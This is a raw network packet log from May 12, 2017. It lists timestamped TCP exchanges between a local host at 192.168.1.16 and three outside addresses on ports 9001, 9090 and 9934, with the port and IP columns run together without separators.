May 12, 2017 18:55:03.720763922 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720772028 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720777988 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720782995 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720788956 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720794916 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720801115 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720807076 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720813036 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720818996 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720838070 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.720849991 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720858097 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720864058 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720870018 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720875978 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720880985 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720886946 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721349955 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:03.721370935 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:03.721491098 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.721508026 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.721525908 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.721540928 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721549034 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721556902 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721563101 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721570015 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721575022 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721580982 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721669912 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.721755981 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.721772909 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721781015 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721786976 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721791983 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721797943 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721805096 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721811056 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722469091 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.722620964 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.722639084 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722650051 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722656965 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722664118 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722670078 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722676039 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722681999 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722834110 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.722848892 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722857952 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722863913 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722870111 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722875118 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722881079 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722886086 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.723747969 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:03.723850012 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.725661039 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.725915909 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.725940943 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.725955009 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.727032900 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.727215052 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.760489941 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:03.760680914 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:03.760716915 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:03.764453888 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.764478922 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.764652967 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.764693975 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.882534981 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.882574081 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.882582903 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.882827997 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.884190083 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.884224892 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.884244919 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.884308100 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.886853933 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.886877060 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.886959076 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.886979103 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.891691923 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.891712904 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.891856909 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.891875029 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.917974949 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.918004990 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.918015003 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.918168068 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.918203115 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.936467886 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.965814114 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.966037989 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.966073990 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975198984 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975222111 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975311041 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975327015 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975347042 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975346088 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.975373030 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.976541996 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.979590893 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.979614019 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.979624033 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.979815006 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.984472990 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.984492064 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.984499931 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.984654903 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.991095066 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.991134882 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.991144896 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.991297007 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.991322041 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.992453098 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.992485046 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.992597103 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.992614031 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.994338036 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.994362116 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.994460106 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.994479895 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.996859074 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.996891022 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.996985912 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.997003078 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.997014046 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.997071028 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.997092009 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.000590086 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:04.001455069 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.003721952 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.003745079 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.003853083 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:04.003879070 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.117835999 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.118035078 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:04.118066072 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.152447939 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:04.152513981 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:04.340449095 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.340512991 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:04.584455013 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:04.584611893 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:06.316457987 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:06.316530943 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:07.252445936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:07.252562046 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.307487011 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.307518005 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.307532072 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.307539940 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.307545900 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.307553053 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.307559967 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308046103 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.308067083 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.308075905 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.308083057 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.308387995 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.308402061 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308408976 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308413982 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308419943 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308936119 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.308976889 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308984995 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308989048 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308994055 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309000015 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309005022 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309010029 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309015989 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309020996 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309026003 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309031010 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309031010 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.309036970 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309051037 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309056044 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309062004 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.310343027 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.310360909 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310895920 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.310915947 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310925007 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310930967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310936928 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310941935 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310949087 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310955048 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310960054 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312609911 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.312865019 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.312889099 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312901020 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312907934 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312913895 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312918901 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312925100 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312931061 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312936068 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316600084 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.316642046 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316728115 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316734076 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316739082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316744089 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316749096 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316754103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316759109 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320614100 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.320652008 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320664883 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320671082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320677042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320682049 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320687056 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320692062 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320697069 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324595928 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.324645996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324661016 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324667931 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324675083 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324681044 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324686050 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324692011 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324697971 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.328634977 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.328687906 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.328702927 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.332611084 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.524463892 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.524647951 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.548464060 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.744247913 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.980467081 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.980600119 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:10.460453987 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:10.460633993 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:11.420500994 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:11.420676947 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:13.344468117 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:13.348615885 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:16.447396040 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:16.447422028 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.200460911 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.200676918 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.746613026 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.746632099 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.747288942 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.747306108 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:17.747927904 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.750457048 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.750471115 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.751125097 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.751138926 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:17.751641035 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.751835108 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.751847029 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:17.752192020 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.753045082 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.753070116 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.753295898 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.753315926 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.753324986 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.753331900 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.753380060 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.753912926 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.753937006 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.754164934 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.754179001 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754188061 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754194021 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754201889 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754210949 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754228115 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754235029 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754240990 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754296064 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.754322052 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754331112 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754337072 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754344940 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754357100 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754364014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754370928 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754414082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754439116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754503965 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.754519939 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754528046 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754534006 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754542112 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754548073 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754555941 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754561901 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754570007 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754575968 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754782915 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.754795074 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:17.754868031 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.754883051 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754890919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.924021959 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.924036980 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.924501896 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.924521923 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.924566984 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.924581051 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925700903 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925719023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925736904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925750971 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925751925 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.925769091 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925843000 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.925873995 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.926836967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.926855087 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.926897049 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.926909924 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.927123070 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.927139997 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.927189112 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.927201986 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.930608034 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.930627108 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.930705070 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.930720091 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.932549000 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.932566881 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.932629108 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.932642937 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.933664083 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.933681011 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.933737040 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.933751106 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.934617996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.934638023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.934695959 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.934709072 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.935626984 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.935645103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.935714960 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.935728073 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.936815023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.936832905 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.936876059 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.936893940 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.936908960 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.937036037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.937052011 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.937108040 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.937119961 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.940632105 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.940654039 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.940711975 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.940738916 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.941507101 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.941528082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.941598892 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.941637993 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.943907976 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.943928003 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.943990946 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.944017887 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.946455956 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.946480989 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.946490049 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.946502924 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.946577072 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.946592093 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948558092 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948575974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948636055 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.948652029 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948868990 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948888063 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948932886 CEST491989001192.168.1.1679.137.85.71
